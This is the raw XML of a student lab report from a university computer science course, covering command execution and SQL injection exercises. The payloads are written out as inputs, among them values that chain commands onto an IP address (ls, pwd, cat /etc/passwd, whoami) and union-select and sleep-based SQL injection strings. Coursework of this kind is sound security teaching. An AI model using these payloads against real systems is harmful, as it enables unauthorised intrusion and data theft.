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spacing w:after="180" w:before="180" w:line="432" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u1ka17zg6nfp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u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="32385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spacing w:after="180" w:before="180" w:line="432" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7hxv7x61cyyf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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIVERSITY OF PETROLEUM AND ENERGY STUDIES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="180" w:line="432" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nba1u13gaa3n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33"/>
          <w:szCs w:val="33"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">School of Computer Science</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="180" w:line="432" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nba1u13gaa3n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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DEHRADUN-248007</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="180" w:line="432" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nba1u13gaa3n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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEMESTER- 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="180" w:line="432" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nba1u13gaa3n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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUG-DEC 2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> TO : Dr. Gopal Rawat </w:t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Submitted by : Arush Dubey</w:t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SAP ID : 500106703</w:t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b w:val="1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="3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1"/>
          <w:szCs w:val="31"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Experiment-4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spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_npaire4u2yp2" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL INJECTION/COMMAND EXECUTION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spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_avo38bp42cor" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMAND EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:spacing w:after="160"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0"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP COMMAND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876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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:u w:val="none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192.168.128.2;ls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color w:val="242424"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="242424"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="37211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color w:val="242424"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:u w:val="none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192.168.128.2;pwd</w:t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7211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192.168.128.2;cat/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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7211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5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192.168.128.2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&amp;&amp;whoami(low)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:ind w:lef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37211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192.168.128.2&amp;whoami(medium)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026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7211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jc w:val="left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SQL Injection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/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8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259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ENTERING 1’ ORDER 2#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jc w:val="left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37211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Entering 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left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4050" cy="3376613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76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jc w:val="left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SQL INJECTION (MEDIUM)</w:t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spacing w:after="160" w:line="259" w:lineRule="auto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Entering 1 OR 1=1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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37211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9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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Entering 1 union select version() , database()#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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37592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160" w:line="259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Entering 1 union select 1 , table_name from information.schema.table where table _schema=0x6467761 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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37592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2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r2lc1pn255cp" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL (Low)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Entering 1’ sleep(5)#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592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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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9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